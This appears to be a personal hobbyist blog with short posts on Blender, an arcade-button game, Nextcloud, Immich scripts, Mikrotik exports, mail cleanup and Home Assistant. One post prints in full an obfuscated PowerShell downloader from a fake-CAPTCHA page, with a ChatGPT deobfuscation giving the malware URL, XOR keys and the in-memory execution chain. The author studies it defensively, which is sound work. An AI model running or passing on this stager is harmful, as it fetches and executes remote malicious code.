My girlfriend needed some images which shows a box and how people have different perspective on things.
AI generated images messes these up. LOL
So I made a little blender scene.
A while back I started modifying Arcade buttons.
Now, I’ve made a board with 16 modified buttons and some micropython code.
White = mole, green = hit in time, red = wrong button/out of time, rainbow = bonus points.
Now i have to think of a display and select buttons, to select the game mode and see the score.
Schematic
Above is a simplified schematic. See notes below.
Speedup ?
Code
First time I saw a exploit on a website.
First I got a clickable captcha, then below screen
I pasted the code in a textfile, because I wanted to know what it wanted to do.
<# Verification code: 0C967110FDD4 #> $ibnegm='jqaCycu';$hujxyo='';for($sldw=0;$sldw -lt '0e4756714b544652'.Length;$sldw+=2){$hujxyo+=[char]([convert]::ToInt32('0e4756714b544652'.Substring($sldw,2),16)-bxor[int][char]$ibnegm[$sldw/2%7])};$sbtfhg='';for($aqsn=0;$aqsn -lt '02051533434c5a1905002012021c44120e6d1a0c1845014f331113'.Length;$aqsn+=2){$sbtfhg+=[char]([convert]::ToInt32('02051533434c5a1905002012021c44120e6d1a0c1845014f331113'.Substring($aqsn,2),16)-bxor[int][char]$ibnegm[$aqsn/2%7])};$xmptqu='';for($ngos=0;$ngos -lt '5b13587a4a534d594058774b0046594855724000470c1303771b521058450527405347081003721c'.Length;$ngos+=2){$xmptqu+=[char]([convert]::ToInt32('5b13587a4a534d594058774b0046594855724000470c1303771b521058450527405347081003721c'.Substring($ngos,2),16)-bxor[int][char]$ibnegm[$ngos/2%7])};$w=New-Object Net.WebClient;$w.Headers.Add('User-Agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6036.123 Safari/537.36');$iucqkg=$w.DownloadString($sbtfhg+'?id='+$xmptqu+'&k=0e4756714b544652');$pusjtr='';for($idtx=0;$idtx -lt $iucqkg.Length;$idtx+=2){$pusjtr+=[char]([convert]::ToInt32($iucqkg.Substring($idtx,2),16)-bxor[int][char]$hujxyo[$idtx/2%8])};iex $pusjtr
I asked ChatGPT what the readable code was.
Below the chat
This is a heavily obfuscated PowerShell downloader/executor. Its purpose is to:
That’s a common malware pattern.
The script defines:
$ibnegm='jqaCycu'
This string is used as a repeating XOR key to decode the hidden values.
This loop:
$hujxyo=''for(...) { $hujxyo += [char]( [convert]::ToInt32(hexpair,16) -bxor [int][char]$ibnegm[...] )}
decodes:
d6'2?32'
and stores it in $hujxyo.
This becomes the XOR key used later to decrypt the server response.
The second block decodes:
https://confiaritalia.it/44fe4
stored in:
$sbtfhg
So the script will connect to:
https://confiaritalia.it/44fe4
The third block decodes:
1a62bfab-6357-4f91-bc69-9f6ca72ec4c1
stored in:
$xmptqu
This looks like a victim ID, campaign ID, or bot identifier.
The script creates a web client:
$w = New-Object Net.WebClient
sets a fake Chrome User-Agent:
Mozilla/5.0 ...Chrome/123.0.6036.123
and downloads:
https://confiaritalia.it/44fe4?id=1a62bfab-6357-4f91-bc69-9f6ca72ec4c1&k=0e4756714b544652
using:
$w.DownloadString(...)
The server is expected to return a hex-encoded string.
The script loops through that response two characters at a time:
$pusjtr += [char]( [convert]::ToInt32(hexpair,16) -bxor [int][char]$hujxyo[...])
using the previously decoded key:
d6'2?32'
to recover the real PowerShell payload.
Finally:
iex $pusjtr
iex (Invoke-Expression) executes the decrypted code immediately in memory.
No file needs to be written to disk.
In pseudocode:
key1 = "jqaCycu"decrypt embedded stringsurl = "https://confiaritalia.it/44fe4"id = "1a62bfab-6357-4f91-bc69-9f6ca72ec4c1"key2 = "d6'2?32'"payload = download(url + "?id=" + id + "&k=0e4756714b544652")decoded_payload = xor_decrypt(payload, key2)execute(decoded_payload)
This is highly suspicious and matches a classic malware stager/downloader:
Invoke-Expression.Without retrieving the content from the remote server, nobody can say exactly what the final payload does, but the code you’ve shown is unquestionably acting as a loader/stager whose job is to fetch and run additional code from a remote host. I would treat it as malicious unless proven otherwise.
Next I tried to download the payload mentioned in step 5.
But the domain was not resolvable and not in archive.org wayback machine.
Maybe ChatGPT got it wrong and it was http://confitalia.it/
This one had a strange history, but no downloadable exploit any more .. case closed
I wanted to migrate the last documents I have in google drive to my own netcloud instance with wordproccessing.
I the past I tried Collabora.
But today Nextcloud Hub 26 came out. WITH euro office!
Euro-Office is a FOSS office suite and collaborative software platform based on OnlyOffice that provides editors for documents, spreadsheets, presentations, and PDFs. The software includes web-based, desktop, and mobile applications designed for document creation, editing, and collaborative work
I installed Nextcloud AIO (all in one), using docker.
Easy peasy.
Even the configuration for reverse proxies are well documented.
And almost perfect (more on this futher down this post)
I tried to open an office document, but it gave me an error.
I’ve seen this mentioned online in forums. (The software is very new, and not well tested yet)
But I found the sollution to this issue. I needed to change the configuration of my apache reverse proxy.
Below in white the part of the config change. Everything else is as documented on : https://github.com/nextcloud/all-in-one
A dump of my immich experience
Getting lists of filenames from an album.
Create an API key from your Immich instance.
NOTE: You will need album.read and asset.read
Then get an ID from an album to get images from.
Open een album in your browser and copy the ID from the URL
Code to get a filelist using Curl
url -s -H "x-api-key: 2Nk4sO4eEm001Cm1Dsnl32UVDEvxxxxxxxxxxxxxxxxx" "https://myphotos.example.com/api/albums/f6a300c2-5027-4c38-a367-xxxxxxxxxxxxxx" | jq -r '. assets[].originalFileName'
Fixing WhatsApp
When ingesting WhatsApp media, the dates in the database will contain the ingest date. This is because the GPS/Date and other exif information are removed from the Media in WhatsApp.
NOTES:
Luckily the WhatsApp media contains the date in the filename.
git clone https://github.com/FlorianKrauseResearch/Immich-Metadata-Update.git
(somewhere on your desktop system/laptop)
Look at installation and usage here: https://github.com/FlorianKrauseResearch/Immich-Metadata-Update
Create a new API key with enough rights!
This software will connect to your immich instance, searches for ingestdates and whatsapp filenames discrepancies.
And wil fix these in the immich database.
I’ve got a directory containing above code for every user, with their own .env file, and custom filters
I’ve edited immich_metadata_update/filters.py
BUILTIN_PATTERNS: dict[str, DatePattern] = {
"whatsapp": DatePattern(
name="WhatsApp",
regex=r"^IMG-(\d{8})-WA\d{4}\.\w+$",
date_format="%Y%m%d",
),
"whatsappvid": DatePattern(
name="WhatsApp",
regex=r"^VID-(\d{8})-WA\d{4}\.\w+$",
date_format="%Y%m%d",
),
"screenshot_basic": DatePattern(
name="Screenshot (basic)",
regex=r"^Screenshot_(\d{8})-\d{6}\.\w+$",
date_format="%Y%m%d",
),
"screenshot_full": DatePattern(
name="Screenshot (with app name)",
regex=r"^Screenshot_(\d{4}-\d{2}-\d{2}).*$",
date_format="%Y-%m-%d",
),
"signal": DatePattern(
name="Signal",
regex=r"^signal-(\d{4}-\d{2}-\d{2})-\d{2}-\d{2}-\d{2}-.*$",
date_format="%Y-%m-%d",
),
}
python3 run.py --preset whatsappvid python3 run.py --preset whatsappvid --apply corrections.json
Incorrect MAP location (0,0 problem, AKA Null Island)
Sometimes media has a incorrect GPS location, or it is missing, or as above set as 0:0
You CAN change the location of Images using the MAP in Immich.
(Select MAP > Day or image > Menu: Change location)
(Also under Utilities)
Immich WILL NOT change your image!, It will write a sidecar file with updated location info.
How I like to fix this:
Download the images for which you want to remove the GPS information.
Delete from Immich.
Run below script over those images to remove Exif information and reupload.
exiftool -gps:all= FILENAME
Loads of the same images
Deduplicate? : Use Utilities > Review duplicates
Select camera instead of WhatsApp image to keep.
(Most of the time bigger and has all exif information!)
Burst photos or simular photos? Use Stacking. This will show only ONE thumbnail in albums/timeline.
Another solution is moving them to Archive!
Uploading using immich-go
https://github.com/simulot/immich-go
./immich-go upload from-folder --server http://192.168.1.2:2283 --api-key GdMq6lZU8Szw6Lc2TXXXXXXXXXXXXXXXXXXXXXX --folder-as-album=FOLDER ~/Pictures/Screenshots/
NOTE: Subdirs become new albums.
Immich Power Tools
https://github.com/immich-power-tools/immich-power-tools
PYTHON script to download an album (with a filename filter)
NOTE: At the bottom you can remove the # comments to also REMOVE from immich
import requests
import os
IMMICH_URL = "http://192.168.1.2:2283/api"
API_KEY = "2Nk4sO4eEm001Cm1Dsnl3XXXXXXXXXXXXXXX"
ALBUM_ID = "c4ce0661-0c4c-4c49-b6c1-XXXXXXXXXXXXXXXXXXXXX"
FILENAME_PREFIX = "VID_" # filename filter
HEADERS = {
"x-api-key": API_KEY
}
DOWNLOAD_DIR = "./downloaded"
os.makedirs(DOWNLOAD_DIR, exist_ok=True)
def get_album_assets(album_id):
r = requests.get(
f"{IMMICH_URL}/albums/{album_id}",
headers=HEADERS
)
r.raise_for_status()
return r.json()["assets"]
def filter_assets(assets):
# simulate SQL LIKE 'IMG_2023%'
return [
a for a in assets
if a["originalFileName"].startswith(FILENAME_PREFIX)
]
def download_asset(asset):
asset_id = asset["id"]
filename = asset["originalFileName"]
url = f"{IMMICH_URL}/assets/{asset_id}/original"
r = requests.get(url, headers=HEADERS, stream=True)
r.raise_for_status()
path = os.path.join(DOWNLOAD_DIR, filename)
with open(path, "wb") as f:
for chunk in r.iter_content(8192):
f.write(chunk)
return path
def delete_assets(asset_ids):
r = requests.delete(
f"{IMMICH_URL}/assets",
headers=HEADERS,
json={"ids": asset_ids}
)
r.raise_for_status()
def main():
print("Fetching album assets...")
assets = get_album_assets(ALBUM_ID)
print(f"Total assets in album: {len(assets)}")
print("Filtering by filename...")
filtered = filter_assets(assets)
print(f"Matched assets: {len(filtered)}")
downloaded = []
print("Downloading...")
for asset in filtered:
try:
path = download_asset(asset)
downloaded.append((asset["id"], path))
except Exception as e:
print(f"Download failed: {asset['id']} - {e}")
# VERIFY
print("Verifying...")
if len(downloaded) != len(filtered):
print("Download mismatch. Abort delete.")
return
for _, path in downloaded:
if not os.path.exists(path) or os.path.getsize(path) == 0:
print(f"Invalid file: {path}")
return
print("Verification OK")
# DELETE
ids_to_delete = [asset_id for asset_id, _ in downloaded]
#print("Deleting assets...")
#delete_assets(ids_to_delete)
print("Done!")
if __name__ == "__main__":
main()
Google killed timeline.
I’ve been experimenting in the past with GPS (gpx) mappers and alternatives.
Now I’ve installed Dawarich, which can use the photos in my immich library.
Spin up a docker instance, create an API key in immich, and GO.
I’ve imported google’s timeline.json from my phone.
Auto post locations to your instance API using:
(Sorry except for a mikrotik script, not much details)
Meanwhile I am looking for a new welder.
Also doing some woodwork. (bird feeder stand)
This is a cool project (Homelable). Below a still incomplete network.
Some code below to generate a CSV for DNS/DHCP entries from a Mikrotik.
(NOTE: seems spaces in comments/name/entries break stuff)
ssh admin@10.x.x.x "/ip/dns/static;export" | grep 10.1.0 | awk '{
addr=""; comment="" ; name=""
for(i=1;i<=NF;i++) {
if($i ~ /^address=/) addr=$i
if($i ~ /^comment=/) comment=$i
if($i ~ /^name=/) name=$i
}
if(addr && name) print addr, name, comment
}' > dnsstatic.out
ssh admin@10.x.x.x "/ip/dhcp-server/lease;export terse" | awk '{
addr=""; comment=""
for(i=1;i<=NF;i++) {
if($i ~ /^address=/) addr=$i
if($i ~ /^comment=/) comment=$i
}
if(addr && comment) print addr, comment
}' > dhcpstatic.out
for f in $(seq 1 254) ; do lease=$(grep "10.1.0.$f " dhcpstatic.out | cut -f3 -d=) ; dns=$(grep "10.1.0.$f " dnsstatic.out | cut -f2,3 -d" " |sed s/name=//g | s
ed s/comment=//g | sed s/\ /,/g | head -1) ; echo -n 10.1.0.$f, ; echo -n $lease ; echo -n "," ; echo $dns ;done > ips.csv
Meanwhile filling my own hosted “Spotify” clone, but better. (Navidrome)
(My immich server is also ingesting while we speak.)
(I often forgot to download important attachments, like orders and important paperwork.
I am using paperless-ngx to make pdfs searchable.
cat All\ mail\ Including\ Spam\ and\ Trash-002.mbox | formail -des munpack
Cleanup script
find -type f -iname '*.desc' -exec rm {} \;
for f in =X*; do
new=$(echo "$f" | sed -E 's/^=X//; s/X=(\.[0-9]+)?$/\1/')
mv -- "$f" "$new"
done
for f in *.[0-9]*; do
base=${f%.[0-9]*}
if [ -f "$base" ] && cmp -s -- "$base" "$f"; then
echo "Removing duplicate: $f"
rm -- "$f"
fi
done
for f in *.[0-9]*; do
n=${f##*.} # 1, 2, 3 ...
base=${f%.*} # winmail.dat
ext=${base##*.} # dat
name=${base%.*} # winmail
mv -- "$f" "${name}-${n}.${ext}"
done
for f in -*; do
new="${f#-}"
mv -- "$f" "$new"
done
for f in -*; do
new="${f#-}"
mv -- "$f" "$new"
done
for f in *X; do
mv -- "$f" "${f%X}"
done
mkdir -p pdf images audio text movies bww zip midi html vcf xml
mv *PDF pdf
mv *pdf pdf
mv *gif images
mv *GIF images
mv *jpg images
mv *bmp images
mv *BMP images
mv *jpeg images
mv *JPG images
mv *Jpg images
mv *png images
mv *tif images
mv *eps images
mv *PNG images
mv *Png images
mv *svg images
mv *psd images
mv *mp3 audio
mv *MP3 audio
mv *wma audio
mv *wav audio
mv *m4a audio
mv *txt text
mv *wri text
mv *doc text
mv *docx text
mv *xls text
mv *XLS text
mv *ppt text
mv *pptx text
mv *xlsx text
mv *mp4 movies
mv *MP4 movies
mv *avi movies
mv *mov movies
mv *MOV movies
mv *mpg movies
mv *MPG movies
mv *bww bww
mv *abc bww
mv *pio bww
mv *zip zip
mv *ZIP zip
mv *tgz zip
mv *tar zip
mv *rar zip
mv *mid midi
mv *html html
mv *htm html
mv *vcf vcf
mv *xml xml
Next thing to do .. sanitize PDF’s
paperless-ngx to ingest
Quick ‘n simple post, so I won’t forget.
Multiple triggers in one Automation, use friendly_name to distinguish entities that triggered the notification.
Message send example “Smoke detected ShellySmokeKitchen”
alias: Smoke detected
description: ""
triggers:
- type: smoke
device_id: bbd0c2ebb949b38a28c6ecca67fb4ebe
entity_id: 888d20ea2075873284708125491695b5
domain: binary_sensor
trigger: device
- type: smoke
device_id: 31bda70d60fc815681fe951469e11a0a
entity_id: 3a9538b025f7d263b5e145d6f4dda859
domain: binary_sensor
trigger: device
- type: smoke
device_id: 1a33c981b1dfca13202b5efe0237fea1
entity_id: 6bf59d8de54a7bdef0bab7daf483221f
domain: binary_sensor
trigger: device
- type: smoke
device_id: 0496d720c844a5648d8b3789b8f4d093
entity_id: e635593a29dc9af3977224b54bf19140
domain: binary_sensor
trigger: device
conditions: []
actions:
- action: notify.pushover
metadata: {}
data:
message: Smoke detected "{{ state_attr(trigger.entity_id, 'friendly_name') }}"
data:
priority: 2
sound: siren
expire: 300
retry: 30
mode: single
Model by wayneclarke, structure paint is cement look from Havo Holland.
